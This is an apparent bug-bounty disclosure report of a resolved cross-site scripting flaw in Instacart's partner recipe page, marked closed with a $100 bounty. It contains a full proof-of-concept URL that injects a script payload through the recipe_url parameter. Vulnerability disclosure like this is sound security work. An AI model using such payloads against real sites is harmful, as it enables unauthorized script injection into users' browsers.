XSS in instacart.com/store/partner_recipe
Medium
I
Instacart
Submitted None
Actions:
Reported by
karel_origin
Vulnerability Details
Technical details and impact analysis
Please open the following url
```
https://www.instacart.com/store/partner_recipe?recipe_url=blocked:alert(1)&partner_name=&ingredients%5B%5D=apples&ingredients%5B%5D=butter&ingredients%5B%5D=Splenda+Brown+Sugar+Blend&ingredients%5B%5D=cinnamon&ingredients%5B%5D=nutmeg&title=Barb%27s+Fried+Apples+-Diabetic-Low+Fat&description=&image_url=%2Fassets%2Fimg%2Fno-recipe-image.jpg
```
and click on the "Barb's Fried Apples -Diabetic-Low Fat" image to trigger the payload.
The affected parameter is
recipe_url
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$100.00
Submitted
Weakness
Cross-site Scripting (XSS) - Generic